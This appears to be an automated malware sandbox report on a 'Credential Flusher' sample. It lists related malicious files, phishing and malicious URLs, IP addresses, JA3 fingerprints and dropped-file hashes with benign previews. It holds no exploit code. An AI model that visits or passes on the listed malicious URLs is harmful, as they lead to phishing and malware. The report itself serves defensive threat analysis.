                                                                                                                                                                                                                                                                                                                                Pl8Tb06C8A.exeGet hashmaliciousCredential FlusherBrowse

                                                                                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                  example.orgrandom.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 93.184.215.14
                                                                                                                                                                                                                                                                                                                                  star-mini.c10r.facebook.comhttps://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.253.35
                                                                                                                                                                                                                                                                                                                                  https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.253.35
                                                                                                                                                                                                                                                                                                                                  http://vionicstore.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.251.35
                                                                                                                                                                                                                                                                                                                                  http://biomed.fiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.0.35
                                                                                                                                                                                                                                                                                                                                  https://kmsprinters.co.uk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.253.35
                                                                                                                                                                                                                                                                                                                                  https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7QwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.0.35
                                                                                                                                                                                                                                                                                                                                  https://iyztciuamr.cfolks.pl/ppGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.0.35
                                                                                                                                                                                                                                                                                                                                  http://www.startfortjeneste.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.252.35
                                                                                                                                                                                                                                                                                                                                  https://mmrtb.com/bonus/com-se-5609/global-bb.php?c=4yzi190z6iz1&k=9b48c9184ff290e347cb73c9f3a90c2b&country_code=SE&carrier=Spring%20Mobil&country_name=Sweden&region=Stockholms%20Lan&city=Stockholm&isp=Tele2%20SWIPnet&lang=sv&os=Windows%2010&osv=&browser=Chrome&browserv=131&brand=Desktop&model=Desktop&marketing_name=Desktop&tablet=4&rheight=768&rwidth=768&e=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.252.35
                                                                                                                                                                                                                                                                                                                                  https://ctrk.klclick2.com/l/01JHDZ0909KRHM82JGE0C594Y8_0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.0.35

                                                                                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                  GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.239.71
                                                                                                                                                                                                                                                                                                                                  http://pub-dfc04553e9094cfc93a2df6d57084097.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  https://urlz.fr/tJIZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.239.71
                                                                                                                                                                                                                                                                                                                                  phish_alert_sp2_2.0.0.0 (2).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  http://cosmetological.xyz/xoqae/go?rgcid=&rx_p=&rgsubid=d-wboqentba-argGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  https://talktalk770.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.239.71
                                                                                                                                                                                                                                                                                                                                  6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.117.59.81
                                                                                                                                                                                                                                                                                                                                  FASTLYUSlogitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.66.137
                                                                                                                                                                                                                                                                                                                                  XML-702.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                                  EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.194.137
                                                                                                                                                                                                                                                                                                                                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.2.137
                                                                                                                                                                                                                                                                                                                                  MissedCall_Record_3295935663.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.130.137
                                                                                                                                                                                                                                                                                                                                  https://xucr.vafdcekgwp.ru/aIDt6/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.194.137
                                                                                                                                                                                                                                                                                                                                  https://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.2.208
                                                                                                                                                                                                                                                                                                                                  http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.194.137
                                                                                                                                                                                                                                                                                                                                  Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.194.137
                                                                                                                                                                                                                                                                                                                                  http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 151.101.66.217
                                                                                                                                                                                                                                                                                                                                  ATGS-MMD-ASUSFantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.43.158.177
                                                                                                                                                                                                                                                                                                                                  https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926eGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 57.150.27.161
                                                                                                                                                                                                                                                                                                                                  https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 57.128.187.108
                                                                                                                                                                                                                                                                                                                                  meth8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                  • 51.173.200.112
                                                                                                                                                                                                                                                                                                                                  meth1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                  • 51.73.248.209
                                                                                                                                                                                                                                                                                                                                  http://wagestream.acemlnb.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.36.213.229
                                                                                                                                                                                                                                                                                                                                  http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 34.36.213.229
                                                                                                                                                                                                                                                                                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 57.143.80.244
                                                                                                                                                                                                                                                                                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 51.114.77.5
                                                                                                                                                                                                                                                                                                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 48.35.125.15

                                                                                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                  bd0bf25947d4a37404f0424edf4db9adgem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.9614.31304.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  app64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 208.68.240.115
                                                                                                                                                                                                                                                                                                                                  fb0aa01abe9d8e4037eb3473ca6e2dcarandom.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123

                                                                                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                    random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                      rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                        rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                          cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                            NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                                                              nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                                nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                                    gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse

                                                                                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_4b44fe99-4fd5-4fa1-b5fd-6fadbb324285.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):7598
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.167157763659895
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:J4LMXWQDcbhbVbTbfbRbObtbyEl7n7JA6UnSrDtTEd/S99:iwHcNhnzFSJSLnSrDhEd/u
                                                                                                                                                                                                                                                                                                                                                      MD5:E1B2CA78DB1A9A36CDF2441696E60E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:D9991451B8FAC9BD1B02F8575CE99EA4C06F90A3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:162B80A73715BB3878E53C4643BEEFC1C7FA4AE64132F62BB3E616D4AA83D979
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EF2B7B68DDF66F653046031F5D28F3EE6223715C438E2B4B07958D702FCD886FEEE43893E02D3BEE84C5FFB06A31A8BFB67AF059D047A9344EBCCB35218D7CA
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"type":"uninstall","id":"4b44fe99-4fd5-4fa1-b5fd-6fadbb324285","creationDate":"2025-01-14T21:14:57.615Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"413174e6-2d70-4d17-b528-bf49e920b3c6","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":4,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_4b44fe99-4fd5-4fa1-b5fd-6fadbb324285.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):7598
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.167157763659895
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:J4LMXWQDcbhbVbTbfbRbObtbyEl7n7JA6UnSrDtTEd/S99:iwHcNhnzFSJSLnSrDhEd/u
                                                                                                                                                                                                                                                                                                                                                      MD5:E1B2CA78DB1A9A36CDF2441696E60E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:D9991451B8FAC9BD1B02F8575CE99EA4C06F90A3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:162B80A73715BB3878E53C4643BEEFC1C7FA4AE64132F62BB3E616D4AA83D979
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EF2B7B68DDF66F653046031F5D28F3EE6223715C438E2B4B07958D702FCD886FEEE43893E02D3BEE84C5FFB06A31A8BFB67AF059D047A9344EBCCB35218D7CA
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"type":"uninstall","id":"4b44fe99-4fd5-4fa1-b5fd-6fadbb324285","creationDate":"2025-01-14T21:14:57.615Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"413174e6-2d70-4d17-b528-bf49e920b3c6","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":4,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):48000
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0765103817949555
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:nYWEvtAHkWWLhv3OdB3NKe2frRJv5FBYoNNZyopbjoRjdvRrardFcKzRYRWmHQgr:nYWEvtAHkWu3OdB3NKe2flJnBYoUibj6
                                                                                                                                                                                                                                                                                                                                                      MD5:757BBCCFC61CBFEE4F51DD799B46F731
                                                                                                                                                                                                                                                                                                                                                      SHA1:C14D68D8C3F32CB4C9C99281C44EF6CB5CA9F22E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E0D1A1C376DDCF46F8963BF9E339D608CD2038EBB6E112F5D16DE4A6E304DB93
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EBDEEB5F7C0A1BBFD9E90C4B58E3AA60A611C988B6B51421768FF3D84875C3D46EA711B384FAC15A4F9158125BF1E5B7B2D69A74E68FC9D97966D4E849003DCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PSMODULECACHE.J.....N.UQ..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet............z..K...C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\PSReadLine.psm1........PSConsoleHostReadLine........Get-PSReadLineOption........Set-PSReadLineKeyHandler........Get-PSReadLineKeyHandler........Set-PSReadLineOption........Remove-PSReadLineKeyHandler.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption....

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):14696
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.463035616536978
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:ZhjrpWMuHhQdhNpvYm6XhqaJrYXeRriGR5axlqmke:7rAMWgr6Xhqa16e9Ra
                                                                                                                                                                                                                                                                                                                                                      MD5:7D9CE106981CB93235E2EBF155D405B4
                                                                                                                                                                                                                                                                                                                                                      SHA1:C603414A1E83C1319B919D58B885763795C25D7A
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F8491C3162E961343CB2C3712A75D2BABA339C0D66B74B7EEA74BEE79373BFFF
                                                                                                                                                                                                                                                                                                                                                      SHA-512:4C236EF9F58F43AD38909C4182E00C9EF7AF9EE905A39407ECB85FC514675B7F4EFD981EFBBAB7E18507719774556500C52B805DCB73E8D9ED29D8C041DF05C1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:@...e................................................@..........H...............o..b~.D.poM...4..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ul21lgw.xe0.psm1

                                                                                                                                                                                                                                                                                                                                                      Download File
